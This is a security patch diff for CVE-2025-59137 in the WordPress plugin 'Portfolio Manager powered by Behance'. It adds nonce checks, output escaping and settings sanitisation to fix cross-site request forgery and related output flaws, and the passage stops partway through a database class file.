CVE-2025-59137: Behance Portfolio Manager <= 1.7.5 – Cross-Site Request Forgery (portfolio-manager-powered-by-behance)

--- a/portfolio-manager-powered-by-behance/classes/eds-bpm-admin.php
+++ b/portfolio-manager-powered-by-behance/classes/eds-bpm-admin.php
@@ -1,87 +1,87 @@
-<?php
-if ( ! defined( 'WPINC' ) ) {
-	die;
-}
-
-
-include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-config.php';
-include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-project-manager.php';
-include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-category-manager.php';
-include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-configuration-manager.php';
-
-if(!class_exists("EDS_BPM_Admin")){
-class EDS_BPM_Admin{
-
-	public function __construct(){
-
-	}
-
-	public function add_bpm_menu(){
-		$project_manager = new EDS_BPM_Project_Manager();
-		$category_manager = new EDS_BPM_Category_Manager();
-		$config_manager = EDS_BPM_Configuration_Manager::get_instance();
-
-		$page_hook1 = add_menu_page( /*$page_title*/__('Portfolio Manager - Projects', 'eds-bpm'),
-					/*$menu_title*/ __('Portfolio Manager','eds-bpm'),
-					/*$capability*/'manage_options',
-					/*$menu_slug*/EDS_BPM_Config::$eds_bpm_top_menu_slug,
-					/*$function*/array($project_manager, 'initialize'),
-					/*$icon_url*/plugin_dir_url(__FILE__).'../images/eds-bpm-16x16.png');
-
-		add_action("admin_print_scripts-" . $page_hook1 , array( $this, 'eds_bpm_add_scripts'));
-        add_action("admin_print_styles-".   $page_hook1 , array( $this, 'eds_bpm_add_css') );
-
-
-        $page_hook2 = add_submenu_page( /* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
-        			/*$page_title*/__('Portfolio Manager - Projects', 'eds-bpm'),
-					/*$menu_title*/ __('All Projects','eds-bpm'),
-					/*$capability*/'manage_options',
-					/*$menu_slug*/EDS_BPM_Config::$eds_bpm_top_menu_slug,
-					/*$function*/array($project_manager, 'initialize'));
-
-		add_action("admin_print_scripts-" . $page_hook2 , array( $this, 'eds_bpm_add_scripts'));
-        add_action("admin_print_styles-".   $page_hook2 , array( $this, 'eds_bpm_add_css') );
-
-        $page_hook3 = add_submenu_page( /* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
-        			/*$page_title*/__('Portfolio Manager - New Project', 'eds-bpm'),
-					/*$menu_title*/ __('Add New','eds-bpm'),
-					/*$capability*/'manage_options',
-					/*$menu_slug*/EDS_BPM_Config::$eds_bpm_new_project_slug,
-					/*$function*/array($project_manager, 'initialize'));
-
-		add_action("admin_print_scripts-" . $page_hook3 , array( $this, 'eds_bpm_add_scripts'));
-        add_action("admin_print_styles-".   $page_hook3 , array( $this, 'eds_bpm_add_css') );
-
-
-		$page_hook4 = add_submenu_page(/* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
-						/* $page_title */ __('Portfolio Manager - Categories', 'eds-bpm'),
-						/* $menu_title */__('Categories', 'eds-bpm'),
-						/* $capability */'manage_options',
-						/* $menu_slug */EDS_BPM_Config::$eds_bpm_category_menu_slug,
-						/* $function */ array($category_manager, 'initialize'));
-
-		add_action("admin_print_scripts-" . $page_hook4 , array( $this, 'eds_bpm_add_scripts'));
-        add_action("admin_print_styles-".   $page_hook4 , array( $this, 'eds_bpm_add_css') );
-
-
-		$page_hook5 = add_submenu_page(/* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
-						/* $page_title */ __('Portfolio Manager - Settings', 'eds-bpm'),
-						/* $menu_title */__('Settings', 'eds-bpm'),
-						/* $capability */'manage_options',
-						/* $menu_slug */EDS_BPM_Config::$eds_bpm_cofig_menu_slug,
-						/* $function */ array($config_manager, 'init_configuration_page'));
-
-		add_action("admin_print_scripts-" . $page_hook5, array( $this, 'eds_bpm_add_scripts'));
-        add_action("admin_print_styles-".   $page_hook5, array( $this, 'eds_bpm_add_css') );
-
-	}
-
-	public function eds_bpm_add_scripts(){
-		do_action('eds_bpm_load_admin_scripts_on_page');
-	}
-
-	public function eds_bpm_add_css(){
-		do_action('eds_bpm_load_admin_styles_on_page');
-	}
-}
+<?php
+if ( ! defined( 'WPINC' ) ) {
+	die;
+}
+
+
+include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-config.php';
+include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-project-manager.php';
+include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-category-manager.php';
+include_once EDS_BPM_Loader::$abs_path . '/classes/eds-bpm-configuration-manager.php';
+
+if(!class_exists("EDS_BPM_Admin")){
+class EDS_BPM_Admin{
+
+	public function __construct(){
+
+	}
+
+	public function add_bpm_menu(){
+		$project_manager = new EDS_BPM_Project_Manager();
+		$category_manager = new EDS_BPM_Category_Manager();
+		$config_manager = EDS_BPM_Configuration_Manager::get_instance();
+
+		$page_hook1 = add_menu_page( /*$page_title*/__('Portfolio Manager - Projects', 'eds-bpm'),
+					/*$menu_title*/ __('Portfolio Manager','eds-bpm'),
+					/*$capability*/'manage_options',
+					/*$menu_slug*/EDS_BPM_Config::$eds_bpm_top_menu_slug,
+					/*$function*/array($project_manager, 'initialize'),
+					/*$icon_url*/plugin_dir_url(__FILE__).'../images/eds-bpm-16x16.png');
+
+		add_action("admin_print_scripts-" . $page_hook1 , array( $this, 'eds_bpm_add_scripts'));
+        add_action("admin_print_styles-".   $page_hook1 , array( $this, 'eds_bpm_add_css') );
+
+
+        $page_hook2 = add_submenu_page( /* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
+        			/*$page_title*/__('Portfolio Manager - Projects', 'eds-bpm'),
+					/*$menu_title*/ __('All Projects','eds-bpm'),
+					/*$capability*/'manage_options',
+					/*$menu_slug*/EDS_BPM_Config::$eds_bpm_top_menu_slug,
+					/*$function*/array($project_manager, 'initialize'));
+
+		add_action("admin_print_scripts-" . $page_hook2 , array( $this, 'eds_bpm_add_scripts'));
+        add_action("admin_print_styles-".   $page_hook2 , array( $this, 'eds_bpm_add_css') );
+
+        $page_hook3 = add_submenu_page( /* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
+        			/*$page_title*/__('Portfolio Manager - New Project', 'eds-bpm'),
+					/*$menu_title*/ __('Add New','eds-bpm'),
+					/*$capability*/'manage_options',
+					/*$menu_slug*/EDS_BPM_Config::$eds_bpm_new_project_slug,
+					/*$function*/array($project_manager, 'initialize'));
+
+		add_action("admin_print_scripts-" . $page_hook3 , array( $this, 'eds_bpm_add_scripts'));
+        add_action("admin_print_styles-".   $page_hook3 , array( $this, 'eds_bpm_add_css') );
+
+
+		$page_hook4 = add_submenu_page(/* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
+						/* $page_title */ __('Portfolio Manager - Categories', 'eds-bpm'),
+						/* $menu_title */__('Categories', 'eds-bpm'),
+						/* $capability */'manage_options',
+						/* $menu_slug */EDS_BPM_Config::$eds_bpm_category_menu_slug,
+						/* $function */ array($category_manager, 'initialize'));
+
+		add_action("admin_print_scripts-" . $page_hook4 , array( $this, 'eds_bpm_add_scripts'));
+        add_action("admin_print_styles-".   $page_hook4 , array( $this, 'eds_bpm_add_css') );
+
+
+		$page_hook5 = add_submenu_page(/* $parent_slug */ EDS_BPM_Config::$eds_bpm_top_menu_slug,
+						/* $page_title */ __('Portfolio Manager - Settings', 'eds-bpm'),
+						/* $menu_title */__('Settings', 'eds-bpm'),
+						/* $capability */'manage_options',
+						/* $menu_slug */EDS_BPM_Config::$eds_bpm_cofig_menu_slug,
+						/* $function */ array($config_manager, 'init_configuration_page'));
+
+		add_action("admin_print_scripts-" . $page_hook5, array( $this, 'eds_bpm_add_scripts'));
+        add_action("admin_print_styles-".   $page_hook5, array( $this, 'eds_bpm_add_css') );
+
+	}
+
+	public function eds_bpm_add_scripts(){
+		do_action('eds_bpm_load_admin_scripts_on_page');
+	}
+
+	public function eds_bpm_add_css(){
+		do_action('eds_bpm_load_admin_styles_on_page');
+	}
+}
 }
 No newline at end of file
--- a/portfolio-manager-powered-by-behance/classes/eds-bpm-behance.php
+++ b/portfolio-manager-powered-by-behance/classes/eds-bpm-behance.php
@@ -1,121 +1,121 @@
-<?php
-if ( ! defined( 'WPINC' ) ) {
-	die;
-}
-include_once EDS_BPM_Loader::$abs_path. '/classes/eds-bpm-config.php';
-include_once EDS_BPM_Loader::$abs_path. '/includes/Be/ApiException.php';
-include_once EDS_BPM_Loader::$abs_path. '/includes/Be/Client.php';
-
-if(!class_exists("EDS_BPM_Behance")){
-class EDS_BPM_Behance{
-
-	var $general_config = null;
-
-	public function __construct(){
-		$this->general_config = EDS_BPM_Config::get_general_config();
-	}
-
-	public function get_behance_project($id){
-		$result = new stdClass();
-		$id = trim($id);
-
-		$result->data = $this->fetch_project_content($id);
-		if($result->data==null || !isset($result->data))
-		{
-			$result->status = 'F';
-			$result->data = null;
-			$result->msg = __('Unable to retrieve Project from Behance.' , 'eds-bpm');
-		}
-		else if($result->data == -1)
-		{
-			$result->status = 'F';
-			$result->data = null;
-			$result->msg = __('You need to enter the Behance API Key in Portfolio Manager > Settings > General. Get one from' , 'eds-bpm');
-			$result->msg .= ' <a href="https://www.behance.net/dev" target="_blank">'. __('here' , 'eds-bpm') . '</a>';
-		}
-		else
-		{
-			$result->status = 'S';
-			$result->msg = __('Project content retrieved successfully.' , 'eds-bpm');
-		}
-		return $result;
-
-	}
-
-
-	private function fetch_project_content($projectID){
-
-		$bAPIKey = $this->general_config['behance_api_key'];
-
-		if(isset($bAPIKey) && $bAPIKey!='')
-		{
-			$clientID= trim($bAPIKey);
-			try {
-				$api = new Be_Client( $clientID);
-				$data =  $api->getProject( $projectID , true);
-				return $data;
-			}
-			catch(Exception $e)
-			{
-				return null;
-			}
-		}
-		else
-			return -1;
-	}
-
-	public function get_user_projects( $user_id ) {
-		$bAPIKey = $this->general_config['behance_api_key'];
-		$userProjects = array();
-		$pageNumber  = 1;
-		if(isset($bAPIKey) && $bAPIKey!='')
-		{
-			$clientID= trim($bAPIKey);
-			try {
-				$api = new Be_Client( $clientID);
-				while(1) {
-					$projects =  $api->getUserProjects( $user_id, array("page" => $pageNumber), true);
-					if( !empty( $projects )) {
-						$userProjects = array_merge($userProjects, $projects);
-						$pageNumber++;
-					} else {
-						break;
-					}
-				}
-
-				return $userProjects;
-			}
-			catch(Exception $e)
-			{
-				return null;
-			}
-		}
-		else
-			return null;
-
-	}
-
-	public function get_project_comments($projectID) {
-
-	    $bAPIKey = $this->general_config['behance_api_key'];
-
-	    if(isset($bAPIKey) && $bAPIKey!='')
-	    {
-	        $clientID= trim($bAPIKey);
-	        try {
-	            $api = new Be_Client( $clientID);
-	            $data =  $api->getProjectComments( $projectID, true);
-	            return $data;
-	        }
-	        catch(Exception $e)
-	        {
-	            return null;
-	        }
-	    }
-	    else
-	        return null;
-	}
-
-
-}
+<?php
+if ( ! defined( 'WPINC' ) ) {
+	die;
+}
+include_once EDS_BPM_Loader::$abs_path. '/classes/eds-bpm-config.php';
+include_once EDS_BPM_Loader::$abs_path. '/includes/Be/ApiException.php';
+include_once EDS_BPM_Loader::$abs_path. '/includes/Be/Client.php';
+
+if(!class_exists("EDS_BPM_Behance")){
+class EDS_BPM_Behance{
+
+	var $general_config = null;
+
+	public function __construct(){
+		$this->general_config = EDS_BPM_Config::get_general_config();
+	}
+
+	public function get_behance_project($id){
+		$result = new stdClass();
+		$id = trim($id);
+
+		$result->data = $this->fetch_project_content($id);
+		if($result->data==null || !isset($result->data))
+		{
+			$result->status = 'F';
+			$result->data = null;
+			$result->msg = __('Unable to retrieve Project from Behance.' , 'eds-bpm');
+		}
+		else if($result->data == -1)
+		{
+			$result->status = 'F';
+			$result->data = null;
+			$result->msg = __('You need to enter the Behance API Key in Portfolio Manager > Settings > General. Get one from' , 'eds-bpm');
+			$result->msg .= ' <a href="https://www.behance.net/dev" target="_blank">'. __('here' , 'eds-bpm') . '</a>';
+		}
+		else
+		{
+			$result->status = 'S';
+			$result->msg = __('Project content retrieved successfully.' , 'eds-bpm');
+		}
+		return $result;
+
+	}
+
+
+	private function fetch_project_content($projectID){
+
+		$bAPIKey = $this->general_config['behance_api_key'];
+
+		if(isset($bAPIKey) && $bAPIKey!='')
+		{
+			$clientID= trim($bAPIKey);
+			try {
+				$api = new Be_Client( $clientID);
+				$data =  $api->getProject( $projectID , true);
+				return $data;
+			}
+			catch(Exception $e)
+			{
+				return null;
+			}
+		}
+		else
+			return -1;
+	}
+
+	public function get_user_projects( $user_id ) {
+		$bAPIKey = $this->general_config['behance_api_key'];
+		$userProjects = array();
+		$pageNumber  = 1;
+		if(isset($bAPIKey) && $bAPIKey!='')
+		{
+			$clientID= trim($bAPIKey);
+			try {
+				$api = new Be_Client( $clientID);
+				while(1) {
+					$projects =  $api->getUserProjects( $user_id, array("page" => $pageNumber), true);
+					if( !empty( $projects )) {
+						$userProjects = array_merge($userProjects, $projects);
+						$pageNumber++;
+					} else {
+						break;
+					}
+				}
+
+				return $userProjects;
+			}
+			catch(Exception $e)
+			{
+				return null;
+			}
+		}
+		else
+			return null;
+
+	}
+
+	public function get_project_comments($projectID) {
+
+	    $bAPIKey = $this->general_config['behance_api_key'];
+
+	    if(isset($bAPIKey) && $bAPIKey!='')
+	    {
+	        $clientID= trim($bAPIKey);
+	        try {
+	            $api = new Be_Client( $clientID);
+	            $data =  $api->getProjectComments( $projectID, true);
+	            return $data;
+	        }
+	        catch(Exception $e)
+	        {
+	            return null;
+	        }
+	    }
+	    else
+	        return null;
+	}
+
+
+}
 }
 No newline at end of file
--- a/portfolio-manager-powered-by-behance/classes/eds-bpm-category-manager.php
+++ b/portfolio-manager-powered-by-behance/classes/eds-bpm-category-manager.php
@@ -58,26 +58,31 @@
 				break;

 			case 'save':
+				check_admin_referer('eds_bpm_nonce');
 				$this->save_category();
 				wp_redirect($url);exit;
 				break;

 			case 'publish':
+				check_admin_referer('eds_bpm_nonce');
 				$this->publish_category();
 				wp_redirect($url);exit;
 				break;

 			case 'unpublish':
+				check_admin_referer('eds_bpm_nonce');
 				$this->unpublish_category();
 				wp_redirect($url);exit;
 				break;

 			case 'delete':
+				check_admin_referer('eds_bpm_nonce');
 				$this->delete_category();
 				wp_redirect($url);exit;
 				break;

 			case 'trash':
+				check_admin_referer('eds_bpm_nonce');
 				$this->trash_category();
 				wp_redirect($url);exit;
 				break;
--- a/portfolio-manager-powered-by-behance/classes/eds-bpm-config.php
+++ b/portfolio-manager-powered-by-behance/classes/eds-bpm-config.php
@@ -1,169 +1,169 @@
-<?php
-if ( ! defined( 'WPINC' ) ) {
-	die;
-}
-
-if(!class_exists("EDS_BPM_Config")){
-class EDS_BPM_Config{
-
-	public static $project_table = "bpm_projects";
-	public static $category_table = "bpm_categories";
-
-	public static $eds_bpm_top_menu_slug = "eds-bpm-top-menu";
-	public static $eds_bpm_new_project_slug = "eds-bpm-new-project";
-	public static $eds_bpm_category_menu_slug = "eds-bpm-cat-menu";
-
-	public static $eds_bpm_cofig_menu_slug = "eds-bpm-config-menu";
-
-	public static $general_config_key = "eds-bpm-general-config";
-	public static $advanced_config_key = "eds-bpm-advanced-config";
-	public static $general_section = "eds-bpm-general-section";
-	public static $advanced_section = "eds-bpm-advanced-section";
-
-	public static $navigation_button_config_key = "eds-bpm-navigation-btn";
-	public static $navigation_button_section = "eds-bpm-navigation-btn-section";
-
-	public static $result_per_page = 10;
-
-	public static $advanced_config = null;
-	public static $general_config = null;
-	public static $navigation_button_config = null;
-
-	public static function get_js_messages() {
-		return array(
-				'chooseImage' => __('Choose Image', 'eds-bpm'),
-				'selectCategory' => __('Please select atleast one Category','eds-bpm'),
-				'deleteSelectedCategory' => __('Are you sure, you wish to delete the selected category(s)?','eds-bpm'),
-				'permanentDeleteSelectedCategory' => __('Are you sure, you wish to permanently delete the selected category?','eds-bpm'),
-				'selectOneProject' => __('Please select atleast one Project','eds-bpm'),
-				'deleteSelectedProject' => __('Are you sure, you wish to delete the selected project(s)?','eds-bpm'),
-				'permanentDeleteSelectedProject' => __('Are you sure, you wish to permanently delete the selected project(s)?','eds-bpm'),
-				'provideUserId' => __('Please provide user id.','eds-bpm'),
-				'importingProjects' => __('Importing Projects...','eds-bpm'),
-				'projectsImported' => __('Project(s) Imported.','eds-bpm'),
-				'unableImportingProjects' => __('Unable to import projects, please check the Behance User Id and Behance API key in settings.','eds-bpm'),
-				'problemImportingProjects' => __('A problem occured while importing projects. Please try again later.','eds-bpm'),
-				'noProjectAvailable' => __('No Project available to save. kindly import the projects first.','eds-bpm'),
-				'savingProjects' => __('Saving Projects, It might take some time...','eds-bpm'),
-				'projectsSaved' => __('Projects saved successfully, refreshing page now.','eds-bpm'),
-				'problemSavingProjects' => __('Problem occured while saving projects. Please try again after some time. If the problem persist, please','eds-bpm'),
-				'contactPluginAdministor' => __('contact plugin administrator','eds-bpm'),
-				'behanceProjectId' => __('Please enter Behance Project ID','eds-bpm'),
-				'inputNumericValue' => __('Please enter a numeric value','eds-bpm'),
-				'portfolioManager' => __('Portfolio Manager - Powered by Behance','eds-bpm'),
-				'authorName' => __('Eleopard Design Studios Pvt. Ltd.','eds-bpm')
-		);
-	}
-
-	public static function get_advanced_config(){
-		if(self::$advanced_config ==null){
-			self::$advanced_config = array();
-
-			if(get_option( self::$advanced_config_key ) === false){
-			    self::$advanced_config = array_merge( array(
-			        'project_background_color' => '#f1f1f1',
-			    	'loading_icon_color' => '#333333',
-			    	'show_project_title' => 'yes',
-			    	'show_creative_fields' =>'yes',
-			    	'show_project_by' => 'yes',
-			    	'show_about_project' => 'yes',
-			    	'show_publish_date' => 'yes',
-			    	'show_views' => 'yes',
-			    	'show_appreciations' => 'yes',
-			    	'show_comments' => 'yes',
-			    	'show_tags' => 'yes',
-			    	'show_tools_used' => 'yes',
-			    	'show_copyright_info' => 'yes',
-			    	'eds_bpm_custom_css' => '',
-				    'show_project_comments' => ''
-			        ), self::$advanced_config );
-			}else
-				self::$advanced_config = (array) get_option( EDS_BPM_Config::$advanced_config_key);
-		}
-
-		return self::$advanced_config;
-	}
-
-
-	public static function get_navigation_button_config(){
-		if(self::$navigation_button_config ==null){
-			self::$navigation_button_config = array();
-
-			if(get_option( self::$navigation_button_config_key ) === false){
-				self::$navigation_button_config = array_merge( array(
-						'show_prev_next_btn' => 'yes',
-						'prev_next_project_order' => 'doc',
-						'prev_btn_text' =>'Prev',
-						'prev_btn_text_color' => '#ffffff',
-						'prev_btn_bg_color' => '#333333',
-						'next_btn_text' => 'Next',
-						'next_btn_text_color' => '#ffffff',
-						'next_btn_bg_color' => '#333333',
-						'prev_next_btn_style' => 'default',
-						'prev_next_btn_position' => 'top',
-						'prev_next_btn_icon' => 'yes'
-				), self::$navigation_button_config );
-			}else
-				self::$navigation_button_config = (array) get_option( EDS_BPM_Config::$navigation_button_config_key);
-		}
-
-		return self::$navigation_button_config;
-	}
-
-	public static function get_general_config(){
-		if(self::$general_config ==null){
-
-			self::$general_config = array();
-
-			if(get_option( self::$general_config_key ) === false){
-				self::$general_config = array_merge( array(
-			        'behance_api_key' => '',
-			    	'result_per_page' => self::$result_per_page,
-					'view_project_on_behance' => '',
-					'open_in_different_tab' => 'yes'
-			        ), self::$general_config );
-			}else{
-				self::$general_config = (array) get_option( EDS_BPM_Config::$general_config_key);
-			}
-
-		}
-
-		return self::$general_config;
-	}
-
-
-	public static function get_current_page_url() {
-	 	$pageURL = 'http';
-	 	if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
-	 	$pageURL .= "://";
-	 	if ($_SERVER["SERVER_PORT"] != "80") {
-	  		$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
-	 	} else {
-	  		$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
-	 	}
-	 	return $pageURL;
-	}
-
-	public static function trim_all( $str , $what = NULL , $with = ' ' )
-	{
-	    if( $what === NULL )
-	    {
-	        //  Character      Decimal      Use
-	        //  ""            0           Null Character
-	        //  "t"            9           Tab
-	        //  "n"           10           New line
-	        //  "x0B"         11           Vertical Tab
-	        //  "r"           13           New Line in Mac
-	        //  " "            32           Space
-
-	        $what   = "\x00-\x20";    //all white-spaces and control chars
-	    }
-
-	    return trim( preg_replace( "/[".$what."]+/" , $with , $str ) , $what );
-	}
-
-	public static function is_curl_loaded() {
-    	return extension_loaded( 'curl' );
-  	}
-}
+<?php
+if ( ! defined( 'WPINC' ) ) {
+	die;
+}
+
+if(!class_exists("EDS_BPM_Config")){
+class EDS_BPM_Config{
+
+	public static $project_table = "bpm_projects";
+	public static $category_table = "bpm_categories";
+
+	public static $eds_bpm_top_menu_slug = "eds-bpm-top-menu";
+	public static $eds_bpm_new_project_slug = "eds-bpm-new-project";
+	public static $eds_bpm_category_menu_slug = "eds-bpm-cat-menu";
+
+	public static $eds_bpm_cofig_menu_slug = "eds-bpm-config-menu";
+
+	public static $general_config_key = "eds-bpm-general-config";
+	public static $advanced_config_key = "eds-bpm-advanced-config";
+	public static $general_section = "eds-bpm-general-section";
+	public static $advanced_section = "eds-bpm-advanced-section";
+
+	public static $navigation_button_config_key = "eds-bpm-navigation-btn";
+	public static $navigation_button_section = "eds-bpm-navigation-btn-section";
+
+	public static $result_per_page = 10;
+
+	public static $advanced_config = null;
+	public static $general_config = null;
+	public static $navigation_button_config = null;
+
+	public static function get_js_messages() {
+		return array(
+				'chooseImage' => __('Choose Image', 'eds-bpm'),
+				'selectCategory' => __('Please select atleast one Category','eds-bpm'),
+				'deleteSelectedCategory' => __('Are you sure, you wish to delete the selected category(s)?','eds-bpm'),
+				'permanentDeleteSelectedCategory' => __('Are you sure, you wish to permanently delete the selected category?','eds-bpm'),
+				'selectOneProject' => __('Please select atleast one Project','eds-bpm'),
+				'deleteSelectedProject' => __('Are you sure, you wish to delete the selected project(s)?','eds-bpm'),
+				'permanentDeleteSelectedProject' => __('Are you sure, you wish to permanently delete the selected project(s)?','eds-bpm'),
+				'provideUserId' => __('Please provide user id.','eds-bpm'),
+				'importingProjects' => __('Importing Projects...','eds-bpm'),
+				'projectsImported' => __('Project(s) Imported.','eds-bpm'),
+				'unableImportingProjects' => __('Unable to import projects, please check the Behance User Id and Behance API key in settings.','eds-bpm'),
+				'problemImportingProjects' => __('A problem occured while importing projects. Please try again later.','eds-bpm'),
+				'noProjectAvailable' => __('No Project available to save. kindly import the projects first.','eds-bpm'),
+				'savingProjects' => __('Saving Projects, It might take some time...','eds-bpm'),
+				'projectsSaved' => __('Projects saved successfully, refreshing page now.','eds-bpm'),
+				'problemSavingProjects' => __('Problem occured while saving projects. Please try again after some time. If the problem persist, please','eds-bpm'),
+				'contactPluginAdministor' => __('contact plugin administrator','eds-bpm'),
+				'behanceProjectId' => __('Please enter Behance Project ID','eds-bpm'),
+				'inputNumericValue' => __('Please enter a numeric value','eds-bpm'),
+				'portfolioManager' => __('Portfolio Manager - Powered by Behance','eds-bpm'),
+				'authorName' => __('Eleopard Design Studios Pvt. Ltd.','eds-bpm')
+		);
+	}
+
+	public static function get_advanced_config(){
+		if(self::$advanced_config ==null){
+			self::$advanced_config = array();
+
+			if(get_option( self::$advanced_config_key ) === false){
+			    self::$advanced_config = array_merge( array(
+			        'project_background_color' => '#f1f1f1',
+			    	'loading_icon_color' => '#333333',
+			    	'show_project_title' => 'yes',
+			    	'show_creative_fields' =>'yes',
+			    	'show_project_by' => 'yes',
+			    	'show_about_project' => 'yes',
+			    	'show_publish_date' => 'yes',
+			    	'show_views' => 'yes',
+			    	'show_appreciations' => 'yes',
+			    	'show_comments' => 'yes',
+			    	'show_tags' => 'yes',
+			    	'show_tools_used' => 'yes',
+			    	'show_copyright_info' => 'yes',
+			    	'eds_bpm_custom_css' => '',
+				    'show_project_comments' => ''
+			        ), self::$advanced_config );
+			}else
+				self::$advanced_config = (array) get_option( EDS_BPM_Config::$advanced_config_key);
+		}
+
+		return self::$advanced_config;
+	}
+
+
+	public static function get_navigation_button_config(){
+		if(self::$navigation_button_config ==null){
+			self::$navigation_button_config = array();
+
+			if(get_option( self::$navigation_button_config_key ) === false){
+				self::$navigation_button_config = array_merge( array(
+						'show_prev_next_btn' => 'yes',
+						'prev_next_project_order' => 'doc',
+						'prev_btn_text' =>'Prev',
+						'prev_btn_text_color' => '#ffffff',
+						'prev_btn_bg_color' => '#333333',
+						'next_btn_text' => 'Next',
+						'next_btn_text_color' => '#ffffff',
+						'next_btn_bg_color' => '#333333',
+						'prev_next_btn_style' => 'default',
+						'prev_next_btn_position' => 'top',
+						'prev_next_btn_icon' => 'yes'
+				), self::$navigation_button_config );
+			}else
+				self::$navigation_button_config = (array) get_option( EDS_BPM_Config::$navigation_button_config_key);
+		}
+
+		return self::$navigation_button_config;
+	}
+
+	public static function get_general_config(){
+		if(self::$general_config ==null){
+
+			self::$general_config = array();
+
+			if(get_option( self::$general_config_key ) === false){
+				self::$general_config = array_merge( array(
+			        'behance_api_key' => '',
+			    	'result_per_page' => self::$result_per_page,
+					'view_project_on_behance' => '',
+					'open_in_different_tab' => 'yes'
+			        ), self::$general_config );
+			}else{
+				self::$general_config = (array) get_option( EDS_BPM_Config::$general_config_key);
+			}
+
+		}
+
+		return self::$general_config;
+	}
+
+
+	public static function get_current_page_url() {
+	 	$pageURL = 'http';
+	 	if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
+	 	$pageURL .= "://";
+	 	if ($_SERVER["SERVER_PORT"] != "80") {
+	  		$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
+	 	} else {
+	  		$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
+	 	}
+	 	return $pageURL;
+	}
+
+	public static function trim_all( $str , $what = NULL , $with = ' ' )
+	{
+	    if( $what === NULL )
+	    {
+	        //  Character      Decimal      Use
+	        //  ""            0           Null Character
+	        //  "t"            9           Tab
+	        //  "n"           10           New line
+	        //  "x0B"         11           Vertical Tab
+	        //  "r"           13           New Line in Mac
+	        //  " "            32           Space
+
+	        $what   = "\x00-\x20";    //all white-spaces and control chars
+	    }
+
+	    return trim( preg_replace( "/[".$what."]+/" , $with , $str ) , $what );
+	}
+
+	public static function is_curl_loaded() {
+    	return extension_loaded( 'curl' );
+  	}
+}
 }
 No newline at end of file
--- a/portfolio-manager-powered-by-behance/classes/eds-bpm-configuration-manager.php
+++ b/portfolio-manager-powered-by-behance/classes/eds-bpm-configuration-manager.php
@@ -269,7 +269,7 @@
 							$this->advanced_config_key,
 							EDS_BPM_Config::$advanced_section );

-		register_setting( $this->advanced_config_key, $this->advanced_config_key);
+		register_setting( $this->advanced_config_key, $this->advanced_config_key, array($this, 'sanitize_advanced_settings'));
 	}

 	public function section_advanced_desc() {
@@ -482,7 +482,7 @@
 		$html ='<textarea
 					name ="'.$this->advanced_config_key.'[eds_bpm_custom_css]"
 					rows ="5"
-				>'.$value.'</textarea>';
+				>'.esc_textarea($value).'</textarea>';
 		echo $html;
 	}

@@ -576,7 +576,7 @@
 				$this->navigation_button_config_key,
 				EDS_BPM_Config::$navigation_button_section );

-		register_setting( $this->navigation_button_config_key, $this->navigation_button_config_key);
+		register_setting( $this->navigation_button_config_key, $this->navigation_button_config_key, array($this, 'sanitize_navigation_button_settings'));

 	}

@@ -664,7 +664,7 @@
 		$html ='<input
 					type ="text"
 					name ="'.$this->navigation_button_config_key.'[prev_btn_text]"
-					value="'.$value.'"
+					value="'.esc_attr($value).'"
 				/>';

 		echo $html;
@@ -697,7 +697,7 @@
 		$html ='<input
 					type ="text"
 					name ="'.$this->navigation_button_config_key.'[next_btn_text]"
-					value="'.$value.'"
+					value="'.esc_attr($value).'"
 				/>';

 		echo $html;
@@ -756,10 +756,28 @@
 	    echo '<h2 class="nav-tab-wrapper">';
 	    foreach ( $this->plugin_config_tabs as $tab_key => $tab_caption ) {
 	        $active = $current_tab == $tab_key ? 'nav-tab-active' : '';
-	        echo '<a class="nav-tab ' . $active . '" href="?page=' . $this->slug . '&tab=' . $tab_key . '">' . $tab_caption . '</a>';
+	        echo '<a class="nav-tab ' . esc_attr($active) . '" href="?page=' . esc_attr($this->slug) . '&tab=' . esc_attr($tab_key) . '">' . esc_html($tab_caption) . '</a>';
 	    }
 	    echo '</h2>';
 	}

+	public function sanitize_advanced_settings($input){
+		foreach($input as $key => $value){
+			if($key === 'eds_bpm_custom_css'){
+				$input[$key] = wp_strip_all_tags($value);
+			} else {
+				$input[$key] = sanitize_text_field($value);
+			}
+		}
+		return $input;
+	}
+
+	public function sanitize_navigation_button_settings($input){
+		foreach($input as $key => $value){
+						$input[$key] = sanitize_text_field($value);
+		}
+		return $input;
+	}
+
 }
 }
 No newline at end of file
--- a/portfolio-manager-powered-by-behance/classes/eds-bpm-db.php
+++ b/portfolio-manager-powered-by-behance/classes/eds-bpm-db.php
@@ -1,935 +1,939 @@
-<?php
-
-if ( ! defined( 'WPINC' ) ) {
-	die;
-}
-include_once EDS_BPM_Loader::$abs_path. '/classes/eds-bpm-behance.php';
-include_once EDS_BPM_Loader::$abs_path. '/classes/eds-bpm-config.php';
-
-if(!class_exists("EDS_BPM_DB")){
-class EDS_BPM_DB{
-
-	public function create_category_table(){
-		//Creating the category table on activation of plugin
-		global $wpdb;
-		$table_name = $wpdb->prefix . EDS_BPM_Config::$category_table;
-		if($wpdb->get_var("SHOW TABLES LIKE '$table_name'") != $table_name)
-		{
-			$sql = "CREATE TABLE $table_name (
-					  `id` integer(10) UNSIGNED NOT NULL auto_increment,
